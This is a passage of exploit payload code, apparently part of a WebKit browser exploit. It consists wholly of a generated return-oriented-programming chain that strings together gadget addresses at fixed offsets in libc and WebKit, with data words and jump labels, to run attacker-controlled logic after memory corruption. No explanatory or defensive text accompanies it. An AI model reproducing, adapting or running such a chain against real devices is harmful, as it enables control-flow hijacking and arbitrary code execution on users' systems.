libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+513904, //L11242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11241:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11242:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11243:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+514000, //L11244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11244:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11246:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+514120, //L11249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+514104, //L11247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11247:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11249:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+514264, //L11252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+514232, //L11250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+514248, //L11251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11250:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11251:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11252:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+514352, //L11254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11253:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11254:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+514408, //L11255
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11255:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11257:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+514488, //L11259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11259:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+514600, //L11260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11260:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11262:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+514720, //L11265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+514704, //L11263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11263:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11265:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+514864, //L11268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+514832, //L11266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+514848, //L11267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11266:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11267:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11268:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+514944, //L11269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11269:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11270:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L11271:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+515072, //L11273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+515056, //L11272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11272:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11273:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+515152, //L11274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11274:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11276:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+515272, //L11279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+515256, //L11277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11277:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11279:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+515352, //L11281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+515384, //L11283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11281:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L11282:
ropchain+515512, //L11280
libc_base+144605 //pop rdi
]);
//L11283:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+515488, //L11285
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+515504, //L11284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L11285:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L11284:
db([0, 0]); // 0x0
//L11280:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+515576, //L11286
//L11229:
libc_base+782311, //pop rsp
ropchain+515592, //L11287
//L11286:
libc_base+782311, //pop rsp
ropchain+511568, //L11185
//L11287:
//L11179:
//L11288:
libc_base+764760, //pop rsi
ropchain+515632, //L11289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11289:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11291:
db([4294967208, 4294967295]); // -0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+515752, //L11294
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+515736, //L11292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11292:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11294:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+515832, //L11295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+515848, //L11296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11295:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11296:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+516008, //L11300
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+515976, //L11298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+515992, //L11299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11297:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L11298:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11299:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11300:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+516064, //L11302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L11302:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+516192, //L11304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+516208, //L11305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+516176, //L11303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11303:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11304:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11305:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+516368, //L11309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+516336, //L11307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+516352, //L11308
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11306:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L11307:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11308:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11309:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+516424, //L11311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L11311:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+516552, //L11313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+516568, //L11314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+516536, //L11312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11312:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11313:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11314:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+516728, //L11318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+516696, //L11316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+516712, //L11317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11315:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L11316:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11317:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11318:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+516784, //L11320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L11320:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+516912, //L11322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+516928, //L11323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+516896, //L11321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11321:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11322:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11323:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+517008, //L11324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+517024, //L11325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11324:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11325:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+517120, //L11327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+517104, //L11326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11326:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11327:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+517200, //L11328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11328:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11329:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11330:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+517344, //L11331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+517376, //L11333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+517360, //L11332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11331:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11332:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11333:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+517552, //L11335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+517568, //L11336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+517536, //L11334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11334:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11335:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11336:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+517728, //L11341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+517744, //L11342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+517680, //L11338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11338:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11339:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L11340:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11341:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11342:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+517856, //L11343+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+517848, //L11343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11343:
db([0, 0]); // 0x0
set_gadgets([
ropchain+517872, //L11343+24
ropchain+520680, //L11337
libc_base+764760, //pop rsi
ropchain+517912, //L11344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11344:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11346:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+518032, //L11349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+518016, //L11347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11347:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11349:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+518208, //L11352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+518224, //L11353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+518176, //L11350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+518192, //L11351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11350:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11351:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11352:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11353:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+518320, //L11355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+518304, //L11354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11354:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11355:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11356:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11357:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L11358:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+518520, //L11360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11360:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+518576, //L11361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11361:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+518712, //L11365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+518696, //L11364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11363:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11364:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11365:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+518832, //L11368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+518800, //L11366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11366:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11367:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11368:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+518968, //L11370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+518984, //L11371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+518952, //L11369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11369:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11370:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11371:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+519144, //L11376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+519160, //L11377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+519096, //L11373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11373:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11374:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L11375:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L11376:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11377:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+519280, //L11378+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+519272, //L11378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11378:
db([0, 0]); // 0x0
set_gadgets([
ropchain+519296, //L11378+24
ropchain+520304, //L11372
libc_base+764760, //pop rsi
ropchain+519336, //L11379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11379:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11381:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+519456, //L11384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+519440, //L11382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11382:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11384:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+519632, //L11387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+519648, //L11388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+519600, //L11385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+519616, //L11386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11385:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11386:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11387:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11388:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+519744, //L11390
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+519728, //L11389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11389:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11390:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+519832, //L11392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11391:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L11392:
db([0, 0]); // 0x0
